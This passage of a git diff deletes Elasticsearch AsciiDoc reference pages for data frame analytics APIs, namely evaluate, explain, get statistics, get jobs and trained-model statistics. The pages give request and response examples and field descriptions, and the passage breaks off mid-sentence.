<1> - "query": { - "bool": { - "filter": [ - { "term": { "ml.is_training": false } } <2> - ] - } - }, - "evaluation": { - "regression": { - "actual_field": "price", <3> - "predicted_field": "ml.price_prediction", <4> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {"offset": 10}, - "huber": {"delta": 1.5} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The output destination index from a {dfanalytics} {reganalysis}. 
-<2> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the test split -only. -<3> The ground truth value for the actual house price. This is required in order -to evaluate results. -<4> The predicted value for house price calculated by the {reganalysis}. - - -The following example calculates the training error: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "student_performance_mathematics_reg", - "query": { - "term": { - "ml.is_training": { - "value": true <1> - } - } - }, - "evaluation": { - "regression": { - "actual_field": "G3", <2> - "predicted_field": "ml.G3_prediction", <3> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {}, - "huber": {} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the train split -only. It means that a training error will be calculated. -<2> The field that contains the ground truth value for the actual student -performance. This is required in order to evaluate results. -<3> The field that contains the predicted value for student performance -calculated by the {reganalysis}. - - -The next example calculates the testing error. The only difference compared with -the previous example is that `ml.is_training` is set to `false` this time, so -the query excludes the train split from the evaluation. - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "student_performance_mathematics_reg", - "query": { - "term": { - "ml.is_training": { - "value": false <1> - } - } - }, - "evaluation": { - "regression": { - "actual_field": "G3", <2> - "predicted_field": "ml.G3_prediction", <3> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {}, - "huber": {} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the test split -only. It means that a testing error will be calculated. -<2> The field that contains the ground truth value for the actual student -performance. This is required in order to evaluate results. -<3> The field that contains the predicted value for student performance -calculated by the {reganalysis}. - - -[[ml-evaluate-classification-example]] -=== {classification-cap} - - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "animal_classification", - "evaluation": { - "classification": { <1> - "actual_field": "animal_class", <2> - "predicted_field": "ml.animal_class_prediction", <3> - "metrics": { - "multiclass_confusion_matrix" : {} <4> - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The evaluation type. -<2> The field that contains the ground truth value for the actual animal -classification. This is required in order to evaluate results. -<3> The field that contains the predicted value for animal classification by -the {classanalysis}. -<4> Specifies the metric for the evaluation. 
- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "classification" : { - "multiclass_confusion_matrix" : { - "confusion_matrix" : [ - { - "actual_class" : "cat", <1> - "actual_class_doc_count" : 12, <2> - "predicted_classes" : [ <3> - { - "predicted_class" : "cat", - "count" : 12 <4> - }, - { - "predicted_class" : "dog", - "count" : 0 <5> - } - ], - "other_predicted_class_doc_count" : 0 <6> - }, - { - "actual_class" : "dog", - "actual_class_doc_count" : 11, - "predicted_classes" : [ - { - "predicted_class" : "dog", - "count" : 7 - }, - { - "predicted_class" : "cat", - "count" : 4 - } - ], - "other_predicted_class_doc_count" : 0 - } - ], - "other_actual_class_count" : 0 - } - } - } --------------------------------------------------- -<1> The name of the actual class that the analysis tried to predict. -<2> The number of documents in the index that belong to the `actual_class`. -<3> This object contains the list of the predicted classes and the number of -predictions associated with the class. -<4> The number of cats in the dataset that are correctly identified as cats. -<5> The number of cats in the dataset that are incorrectly classified as dogs. -<6> The number of documents that are classified as a class that is not listed as -a `predicted_class`. - - - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "animal_classification", - "evaluation": { - "classification": { <1> - "actual_field": "animal_class", <2> - "metrics": { - "auc_roc" : { <3> - "class_name": "dog" <4> - } - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The evaluation type. -<2> The field that contains the ground truth value for the actual animal -classification. This is required in order to evaluate results. -<3> Specifies the metric for the evaluation. -<4> Specifies the class name that is treated as positive during the evaluation, -all the other classes are treated as negative. - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "classification" : { - "auc_roc" : { - "score" : 0.8941788639536681 - } - } -} --------------------------------------------------- -// TEST[skip:TBD] \ No newline at end of file diff --git a/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc deleted file mode 100644 index ccd33b8500e..00000000000 --- a/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[explain-dfanalytics]] -= Explain {dfanalytics} API - -[subs="attributes"] -++++ -Explain {dfanalytics} -++++ - -Explains a {dataframe-analytics-config}. - -experimental[] - - -[[ml-explain-dfanalytics-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics/_explain` + - -`POST _ml/data_frame/analytics/_explain` + - -`GET _ml/data_frame/analytics//_explain` + - -`POST _ml/data_frame/analytics//_explain` - - -[[ml-explain-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. 
- - -[[ml-explain-dfanalytics-desc]] -== {api-description-title} - -This API provides explanations for a {dataframe-analytics-config} that either -already exists or has not been created yet. -The following explanations are provided: - -* which fields are included in or excluded from the analysis, and why, -* how much memory is estimated to be required. The estimate can be used when - deciding the appropriate value for the `model_memory_limit` setting later on. - -If you have object fields or fields that are excluded via source filtering, -they are not included in the explanation. - - -[[ml-explain-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics] - -[[ml-explain-dfanalytics-request-body]] -== {api-request-body-title} - -A {dataframe-analytics-config} as described in <>. -Note that `id` and `dest` don't need to be provided in the context of this API. - -[role="child_attributes"] -[[ml-explain-dfanalytics-results]] -== {api-response-body-title} - -The API returns a response that contains the following: - -`field_selection`:: -(array) -An array of objects that explain the selection decision for each field, sorted by -field name. -+ -.Properties of `field_selection` objects -[%collapsible%open] -==== -`is_included`::: -(Boolean) Whether the field is selected to be included in the analysis. - -`is_required`::: -(Boolean) Whether the field is required. - -`feature_type`::: -(string) The feature type of this field for the analysis. May be `categorical` -or `numerical`. - -`mapping_types`::: -(string) The mapping types of the field. - -`name`::: -(string) The field name. - -`reason`::: -(string) The reason a field is not selected to be included in the analysis. -==== - -`memory_estimation`:: -(object) -An object containing the memory estimates. -+ -.Properties of `memory_estimation` -[%collapsible%open] -==== -`expected_memory_with_disk`::: -(string) Estimated memory usage under the assumption that overflowing to disk is -allowed during {dfanalytics}. `expected_memory_with_disk` is usually smaller -than `expected_memory_without_disk` because using disk allows limiting the amount of main -memory needed to perform {dfanalytics}. - -`expected_memory_without_disk`::: -(string) Estimated memory usage under the assumption that the whole -{dfanalytics} should happen in memory (i.e. without overflowing to disk).
-==== - - - -[[ml-explain-dfanalytics-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/_explain -{ - "source": { - "index": "houses_sold_last_10_yrs" - }, - "analysis": { - "regression": { - "dependent_variable": "price" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following results: - -[source,console-result] ----- -{ - "field_selection": [ - { - "field": "number_of_bedrooms", - "mappings_types": ["integer"], - "is_included": true, - "is_required": false, - "feature_type": "numerical" - }, - { - "field": "postcode", - "mappings_types": ["text"], - "is_included": false, - "is_required": false, - "reason": "[postcode.keyword] is preferred because it is aggregatable" - }, - { - "field": "postcode.keyword", - "mappings_types": ["keyword"], - "is_included": true, - "is_required": false, - "feature_type": "categorical" - }, - { - "field": "price", - "mappings_types": ["float"], - "is_included": true, - "is_required": true, - "feature_type": "numerical" - } - ], - "memory_estimation": { - "expected_memory_without_disk": "128MB", - "expected_memory_with_disk": "32MB" - } -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc b/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc deleted file mode 100644 index 333e7a017de..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc +++ /dev/null @@ -1,601 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-dfanalytics-stats]] -= Get {dfanalytics-jobs} statistics API -[subs="attributes"] -++++ -Get {dfanalytics-jobs} stats -++++ - -Retrieves usage information for {dfanalytics-jobs}. - -experimental[] - -[[ml-get-dfanalytics-stats-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics//_stats` + - -`GET _ml/data_frame/analytics/,/_stats` + - -`GET _ml/data_frame/analytics/_stats` + - -`GET _ml/data_frame/analytics/_all/_stats` + - -`GET _ml/data_frame/analytics/*/_stats` - - -[[ml-get-dfanalytics-stats-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - -[[ml-get-dfanalytics-stats-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] - - -[[ml-get-dfanalytics-stats-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size] - -`verbose`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=verbose] - -[role="child_attributes"] -[[ml-get-dfanalytics-stats-response-body]] -== {api-response-body-title} - -`data_frame_analytics`:: -(array) -An array of objects that contain usage information for {dfanalytics-jobs}, which -are sorted by the `id` value in ascending order. -+ -.Properties of {dfanalytics-job} usage resources -[%collapsible%open] -==== -//Begin analysis_stats -`analysis_stats`::: -(object) -An object containing information about the analysis job. 
-+ -.Properties of `analysis_stats` -[%collapsible%open] -===== -//Begin classification_stats -`classification_stats`:::: -(object) -An object containing information about the {classanalysis} job. -+ -.Properties of `classification_stats` -[%collapsible%open] -====== -//Begin class_hyperparameters -`hyperparameters`:::: -(object) -An object containing the parameters of the {classanalysis} job. -+ -.Properties of `hyperparameters` -[%collapsible%open] -======= -`alpha`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-alpha] - -`class_assignment_objective`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=class-assignment-objective] - -`downsample_factor`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-downsample-factor] - -`eta`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`eta_growth_rate_per_tree`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-eta-growth] - -`feature_bag_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`gamma`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_attempts_to_add_tree`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-attempts] - -`max_optimization_rounds_per_hyperparameter`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-optimization-rounds] - -`max_trees`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_folds`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-folds] - -`num_splits_per_feature`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-splits] - -`soft_tree_depth_limit`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-limit] - -`soft_tree_depth_tolerance`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-tolerance] -======= -//End class_hyperparameters - -`iteration`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-iteration] - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin class_timing_stats -`timing_stats`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Properties of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] - -`iteration_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-iteration] -======= -//End class_timing_stats - -//Begin class_validation_loss -`validation_loss`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss] -+ -.Properties of `validation_loss` -[%collapsible%open] -======= -`fold_values`:::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-fold] - -`loss_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-type] -======= -//End class_validation_loss -====== -//End classification_stats - -//Begin outlier_detection_stats -`outlier_detection_stats`:::: -(object) -An object containing information about the {oldetection} job. 
-+ -.Properties of `outlier_detection_stats` -[%collapsible%open] -====== -//Begin parameters -`parameters`:::: -(object) -The list of job parameters specified by the user or determined by algorithmic -heuristics. -+ -.Properties of `parameters` -[%collapsible%open] -======= -`compute_feature_influence`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=compute-feature-influence] - -`feature_influence_threshold`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-influence-threshold] - -`method`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=method] - -`n_neighbors`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=n-neighbors] - -`outlier_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=outlier-fraction] - -`standardization_enabled`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=standardization-enabled] -======= -//End parameters - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin od_timing_stats -`timing_stats`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Property of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] -======= -//End od_timing_stats -====== -//End outlier_detection_stats - -//Begin regression_stats -`regression_stats`:::: -(object) -An object containing information about the {reganalysis}. -+ -.Properties of `regression_stats` -[%collapsible%open] -====== -//Begin reg_hyperparameters -`hyperparameters`:::: -(object) -An object containing the parameters of the {reganalysis}. -+ -.Properties of `hyperparameters` -[%collapsible%open] -======= -`alpha`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-alpha] - -`downsample_factor`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-downsample-factor] - -`eta`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`eta_growth_rate_per_tree`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-eta-growth] - -`feature_bag_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`gamma`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_attempts_to_add_tree`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-attempts] - -`max_optimization_rounds_per_hyperparameter`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-optimization-rounds] - -`max_trees`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_folds`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-folds] - -`num_splits_per_feature`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-splits] - -`soft_tree_depth_limit`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-limit] - -`soft_tree_depth_tolerance`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-tolerance] -======= -//End reg_hyperparameters - -`iteration`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-iteration] - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin reg_timing_stats -`timing_stats`:::: -(object) 
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Properties of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] - -`iteration_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-iteration] -======= -//End reg_timing_stats - -//Begin reg_validation_loss -`validation_loss`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss] -+ -.Properties of `validation_loss` -[%collapsible%open] -======= -`fold_values`:::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-fold] - -`loss_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-type] -======= -//End reg_validation_loss -====== -//End regression_stats -===== -//End analysis_stats - - -`assignment_explanation`::: -(string) -For running jobs only, contains messages relating to the selection of a node to -run the job. - -//Begin data_counts -`data_counts`::: -(object) -An object that provides counts for the quantity of documents skipped, used in -training, or available for testing. -+ -.Properties of `data_counts` -[%collapsible%open] -===== -`skipped_docs_count`::: -(integer) -The number of documents that are skipped during the analysis because they -contained values that are not supported by the analysis. For example, -{oldetection} does not support missing fields so it skips documents with missing -fields. Likewise, all types of analysis skip documents that contain arrays with -more than one element. - -`test_docs_count`::: -(integer) -The number of documents that are not used for training the model and can be used -for testing. - -`training_docs_count`::: -(integer) -The number of documents that are used for training the model. -===== -//End data_counts - -`id`::: -(string) -The unique identifier of the {dfanalytics-job}. - -`memory_usage`::: -(Optional, object) -An object describing memory usage of the analytics. It is present only after the -job is started and memory usage is reported. -+ -.Properties of `memory_usage` -[%collapsible%open] -===== -`memory_reestimate_bytes`:::: -(long) -This value is present only when the `status` is `hard_limit`; it -is a new estimate of how much memory the job needs. - -`peak_usage_bytes`:::: -(long) -The number of bytes used at the highest peak of memory usage. - -`status`:::: -(string) -The memory usage status. May have one of the following values: -+ --- -* `ok`: usage stayed below the limit. -* `hard_limit`: usage surpassed the configured memory limit. --- - -`timestamp`:::: -(date) -The timestamp when memory usage was calculated. -===== - -`node`::: -(object) -Contains properties for the node that runs the job. This information is -available only for running jobs. -+ -.Properties of `node` -[%collapsible%open] -===== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. - -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -===== - -`progress`::: -(array) The progress report of the {dfanalytics-job} by phase.
-+ -.Properties of phase objects -[%collapsible%open] -===== -`phase`::: -(string) Defines the phase of the {dfanalytics-job}. Possible phases: -* `reindexing`, -* `loading_data`, -* `computing_outliers` (for {oldetection} only), -* `feature_selection` (for {regression} and {classification} only), -* `coarse_parameter_search` (for {regression} and {classification} only), -* `fine_tuning_parameters` (for {regression} and {classification} only), -* `final_training` (for {regression} and {classification} only), -* `writing_results`, -* `inference` (for {regression} and {classification} only). -+ -To learn more about the different phases, refer to -{ml-docs}/ml-dfa-phases.html[How a {dfanalytics} job works]. - -`progress_percent`::: -(integer) The progress that the {dfanalytics-job} has made expressed in -percentage. -===== - -`state`::: -(string) The status of the {dfanalytics-job}, which can be one of the following -values: `analyzing`, `failed`, `reindexing`, `started`, `starting`, `stopped`, -`stopping`. -==== -//End of data_frame_analytics - -[[ml-get-dfanalytics-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-dfanalytics-stats-example]] -== {api-examples-title} - -The following API retrieves usage information for the -{ml-docs}/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]: - -[source,console] --------------------------------------------------- -GET _ml/data_frame/analytics/ecommerce/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data] - - -The API returns the following results: - -[source,console-result] ----- -{ - "count" : 1, - "data_frame_analytics" : [ - { - "id" : "ecommerce", - "state" : "stopped", - "progress" : [ - { - "phase" : "reindexing", - "progress_percent" : 100 - }, - { - "phase" : "loading_data", - "progress_percent" : 100 - }, - { - "phase" : "analyzing", - "progress_percent" : 100 - }, - { - "phase" : "writing_results", - "progress_percent" : 100 - } - ], - "data_counts" : { - "training_docs_count" : 3321, - "test_docs_count" : 0, - "skipped_docs_count" : 0 - }, - "memory_usage" : { - "timestamp" : 1586905058000, - "peak_usage_bytes" : 279484 - }, - "analysis_stats" : { - "outlier_detection_stats" : { - "timestamp" : 1586905058000, - "parameters" : { - "n_neighbors" : 0, - "method" : "ensemble", - "compute_feature_influence" : true, - "feature_influence_threshold" : 0.1, - "outlier_fraction" : 0.05, - "standardization_enabled" : true - }, - "timing_stats" : { - "elapsed_time" : 245 - } - } - } - } - ] -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc deleted file mode 100644 index cb1d5690afd..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc +++ /dev/null @@ -1,215 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-dfanalytics]] -= Get {dfanalytics-jobs} API -[subs="attributes"] -++++ -Get {dfanalytics-jobs} -++++ - -Retrieves configuration information for {dfanalytics-jobs}. 
- -experimental[] - - -[[ml-get-dfanalytics-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics/` + - -`GET _ml/data_frame/analytics/,` + - -`GET _ml/data_frame/analytics/` + - -`GET _ml/data_frame/analytics/_all` - - -[[ml-get-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-get-dfanalytics-desc]] -== {api-description-title} - -You can get information for multiple {dfanalytics-jobs} in a single API request -by using a comma-separated list of {dfanalytics-jobs} or a wildcard expression. - - -[[ml-get-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] -+ --- -You can get information for all {dfanalytics-jobs} by using _all, by specifying -`*` as the ``, or by omitting the -``. --- - - -[[ml-get-dfanalytics-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size] - -[role="child_attributes"] -[[ml-get-dfanalytics-results]] -== {api-response-body-title} - -`data_frame_analytics`:: -(array) -An array of {dfanalytics-job} resources, which are sorted by the `id` value in -ascending order. -+ -.Properties of {dfanalytics-job} resources -[%collapsible%open] -==== -`analysis`::: -(object) The type of analysis that is performed on the `source`. - -//Begin analyzed_fields -`analyzed_fields`::: -(object) Contains `includes` and/or `excludes` patterns that select which fields -are included in the analysis. -+ -.Properties of `analyzed_fields` -[%collapsible%open] -===== -`excludes`::: -(Optional, array) An array of strings that defines the fields that are excluded -from the analysis. - -`includes`::: -(Optional, array) An array of strings that defines the fields that are included -in the analysis. -===== -//End analyzed_fields -//Begin dest -`dest`::: -(string) The destination configuration of the analysis. -+ -.Properties of `dest` -[%collapsible%open] -===== -`index`::: -(string) The _destination index_ that stores the results of the -{dfanalytics-job}. - -`results_field`::: -(string) The name of the field that stores the results of the analysis. Defaults -to `ml`. -===== -//End dest - -`id`::: -(string) The unique identifier of the {dfanalytics-job}. - -`model_memory_limit`::: -(string) The `model_memory_limit` that has been set to the {dfanalytics-job}. - -`source`::: -(object) The configuration of how the analysis data is sourced. It has an -`index` parameter and optionally a `query` and a `_source`. -+ -.Properties of `source` -[%collapsible%open] -===== -`index`::: -(array) Index or indices on which to perform the analysis. It can be a single -index or index pattern as well as an array of indices or patterns. - -`query`::: -(object) The query that has been specified for the {dfanalytics-job}. The {es} -query domain-specific language (<>). This value corresponds to -the query object in an {es} search POST body. By default, this property has the -following value: `{"match_all": {}}`. 
- -`_source`::: -(object) Contains the specified `includes` and/or `excludes` patterns that -select which fields are present in the destination. Fields that are excluded -cannot be included in the analysis. -+ -.Properties of `_source` -[%collapsible%open] -====== -`excludes`::: -(array) An array of strings that defines the fields that are excluded from the -destination. - -`includes`::: -(array) An array of strings that defines the fields that are included in the -destination. -====== -//End of _source -===== -//End source -==== - - -[[ml-get-dfanalytics-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-dfanalytics-example]] -== {api-examples-title} - -The following example gets configuration information for the `loganalytics` -{dfanalytics-job}: - -[source,console] --------------------------------------------------- -GET _ml/data_frame/analytics/loganalytics --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "data_frame_analytics": [ - { - "id": "loganalytics", - "source": { - "index": "logdata", - "query": { - "match_all": {} - } - }, - "dest": { - "index": "logdata_out", - "results_field": "ml" - }, - "analysis": { - "outlier_detection": {} - }, - "model_memory_limit": "1gb", - "create_time": 1562265491319, - "version": "8.0.0" - } - ] -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc b/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc deleted file mode 100644 index 3e70ed2abce..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trained-models-stats]] -= Get trained models statistics API -[subs="attributes"] -++++ -Get trained models stats -++++ - -Retrieves usage information for trained models. - -experimental[] - - -[[ml-get-trained-models-stats-request]] -== {api-request-title} - -`GET _ml/trained_models/_stats` + - -`GET _ml/trained_models/_all/_stats` + - -`GET _ml/trained_models//_stats` + - -`GET _ml/trained_models/,/_stats` + - -`GET _ml/trained_models/,/_stats` - - -[[ml-get-trained-models-stats-prereq]] -== {api-prereq-title} - -Required privileges which should be added to a custom role: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - -[[ml-get-trained-models-stats-desc]] -== {api-description-title} - -You can get usage information for multiple trained models in a single API -request by using a comma-separated list of model IDs or a wildcard expression. 
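For example, assuming the model IDs shown in the example response below exist in your cluster, the following request returns statistics for one model selected by its exact ID plus every model whose ID starts with `flight-delay-`:

[source,console]
--------------------------------------------------
GET _ml/trained_models/regression-job-one-1574775307356,flight-delay-*/_stats
--------------------------------------------------
// TEST[skip:requires trained models]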
- - -[[ml-get-trained-models-stats-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-get-trained-models-stats-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match-models] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from-models] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size-models] - -[role="child_attributes"] -[[ml-get-trained-models-stats-results]] -== {api-response-body-title} - -`count`:: -(integer) -The total number of trained model statistics that matched the requested ID -patterns. Could be higher than the number of items in the `trained_model_stats` -array as the size of the array is restricted by the supplied `size` parameter. - -`trained_model_stats`:: -(array) -An array of trained model statistics, which are sorted by the `model_id` value -in ascending order. -+ -.Properties of trained model stats -[%collapsible%open] -==== -`model_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - -`pipeline_count`::: -(integer) -The number of ingest pipelines that currently refer to the model. - -`inference_stats`::: -(object) -A collection of inference stats fields. -+ -.Properties of inference stats -[%collapsible%open] -===== - -`missing_all_fields_count`::: -(integer) -The number of inference calls where all the training features for the model -were missing. - -`inference_count`::: -(integer) -The total number of times the model has been called for inference. -This is across all inference contexts, including all pipelines. - -`cache_miss_count`::: -(integer) -The number of times the model was loaded for inference and was not retrieved -from the 